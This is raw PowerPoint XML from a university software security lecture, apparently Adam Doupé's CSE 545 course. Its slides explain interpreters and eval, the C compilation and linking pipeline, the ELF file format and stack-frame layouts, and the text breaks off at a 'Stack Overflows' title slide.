          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6533B83B-44E4-484B-85B6-9FCF77BE0DAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164542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752600"/>
            <a:ext cx="4267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267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58200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FEE62F38-8D23-B74E-AB9B-1D546E6113A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139146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7" name="Footer Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="38917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t>Adam Doupé, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" smtClean="0"/>
              <a:t> Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21734406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926531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8143121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005068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6"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089913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5"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6155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2754ED01-E2A0-4C1E-8E21-014B99041579}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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9429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4413800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86"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8242300" y="6356353"/>
            <a:ext cx="444500" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988045441"/>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 id="2147484559" r:id="rId12"/>
    <p:sldLayoutId id="2147484560" r:id="rId13"/>
    <p:sldLayoutId id="2147484561" r:id="rId1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4.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4.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5.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8.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9.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0.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9.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/></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5.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7.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0.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5.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Insecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886199"/>
            <a:ext cx="6400800" cy="2059281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
              <a:t>CSE 545 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Software Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spring 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6581001"/>
            <a:ext cx="5334000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Content of some slides provided by Giovanni Vigna of UCSB, with approval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81389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program is passed to an interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The program might be translated into an intermediate representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python byte-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each instruction is parsed and executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In most interpreted languages it is possible to generate and execute code dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124589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2084" y="30509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6" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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68715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2084" y="30509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58584105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7044" y="33161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80226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0x80483a6</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7044" y="33161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116860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0x80483a6</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7044" y="33161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0601217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0x80483a8</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6374" y="35904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7029190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0x80483a8</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6374" y="35904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65264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0x80483ab</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30468" y="38700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81366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0x80483ab</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30468" y="38700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87399619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0x80483b3</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30468" y="415531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465903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Compilation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The preprocessor expands the code to include definitions, expand macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GNU/Linux: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C preprocessor is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cpp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The compiler turns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>into architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GNU/Linux: The C compiler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prog.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will generate the assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option to generate 32-bit assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17915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0x80483b3</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30468" y="415531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72121823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0x80483ba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38942" y="44296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1171383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0x80483ba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38942" y="44296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2949412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38942" y="44296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6848272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52696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21697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99356139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210104395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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="8726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17212725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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="8726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07531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assembler turns the assembly into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>binary object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GNU/Linux: The assembler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A binary object contains the binary code and additional metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relocation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>information about things that need to be fixed once the code and the data are loaded into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information about the symbols defined by the object file and the symbols that are imported from different objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Debugging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108733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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="11561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73537417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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="306534"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Right Bracket 22"/>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24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>main</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-15555" y="2157984"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Bracket 25"/>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27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="11561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45828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0x28</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11561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1622341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0x28</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142133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0436801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0x28</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142133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00007549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0x28</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0x804839d</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16865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06180623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0x32</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0x804839d</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16865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8128046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0x32</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0x80483a0</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19608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85376590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0x80483a0</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19608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55084827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0x80483a3</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304922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linker combines the binary object with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>libraries, resolving references that the code has to external objects (e.g., functions) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182823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0x80483a3</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296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0x80483a3</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1958168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0x80483a3</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449208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7326082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0x80483bf</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8794827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0x80483bf</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27925059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0x80483bf</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90599366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0x80483bf</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47040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191493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0x80483bf</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47040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1046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0x80483c2</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49874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65788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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Executable and Linkable Format (ELF) is one of the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>widely-used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>binary object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ELF is architecture-independent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF files are of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>four types:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>elocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: need to be fixed by the linker before being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xecutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: ready for execution (all symbols have been resolved with the exception of those related to shared libs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shared: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shared libraries with the appropriate linking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Core: core dumps created when a program terminated with a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</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95254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4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4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4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4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43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43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43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0x80483c2</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49874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12003772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0x80483c5</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77992854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0x80483c5</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7216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0x80483c5</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30915735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0x80483c5</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2778601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0x80483c5</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2771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6830080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0x80483c6</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552699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2771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19190095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42" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
